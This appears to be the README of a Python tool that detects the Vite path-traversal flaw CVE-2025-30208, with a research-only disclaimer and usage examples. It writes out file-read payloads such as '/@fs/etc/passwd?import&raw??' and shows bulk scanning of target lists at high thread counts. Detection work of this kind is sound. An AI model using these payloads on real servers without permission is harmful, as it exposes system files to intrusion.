
Vite-CVE-2025-30208动态检测脚本,支持默认路径,自定义路径动态检测
본 문서에서 설명하는 취약점 및 재현 절차는 오직 사이버 보안 연구 및 교육 목적으로 제공됩니다. 본 문서의 정보를 불법 목적이나 승인되지 않은 시스템 테스트에 사용해서는 안 됩니다. 작성자는 본 문서의 정보 사용으로 인해 발생하는 직간접적 손해에 대해 책임을 지지 않습니다.
인용 시 출처를 명시해 주세요!
https://pc.fenchuan8.com/#/index?forum=101158&yqm=DGR4X
usage: vite_check.py [-h] [-f FILE] [-u URL] [-p PAYLOAD] [--proxy PROXY] [-o OUTPUT] [-t THREADS]
Vite路径遍历漏洞检测工具 Author:iSee857
optional arguments:
-h, --help 显示帮助信息
-f FILE, --file FILE 包含目标URL的文件
-u URL, --url URL 单个目标URL
-p PAYLOAD, --payload PAYLOAD
自定义检测路径(支持两种格式):
1. 带检测标识: /path??indicator
2. 仅路径: /path?param=1??
示例:
-p "/@fs/C://windows/win.ini?import&raw??"
-p "/@fs/etc/passwd?import&raw??"
--proxy PROXY 代理服务器地址(如: http://127.0.0.1:8080)
-o OUTPUT, --output OUTPUT
输出文件名(默认: results.xlsx)
-t THREADS, --threads THREADS
并发线程数量(默认: 50,范围: 1-200)```
사용 예제
1. 단일 대상 스캔:
python CVE-2025-30208-PoC.py -u http://example.com -t 5
2. 대상 파일 일괄 스캔:
python CVE-2025-30208-PoC.py -f targets.txt -o vuln_results.xlsx
3. 사용자 정의 페이로드 사용:
python CVE-2025-30208-PoC.py -u http://example.com -p "/@fs/etc/passwd?import&raw??"
4. 프록시 디버깅 사용:
python CVE-2025-30208-PoC.py -u http://example.com --proxy http://127.0.0.1:8080
5. 매개변수 조합 사용:
python CVE-2025-30208-PoC.py -f targets.txt -t 200 -o critical_vulns.xlsx

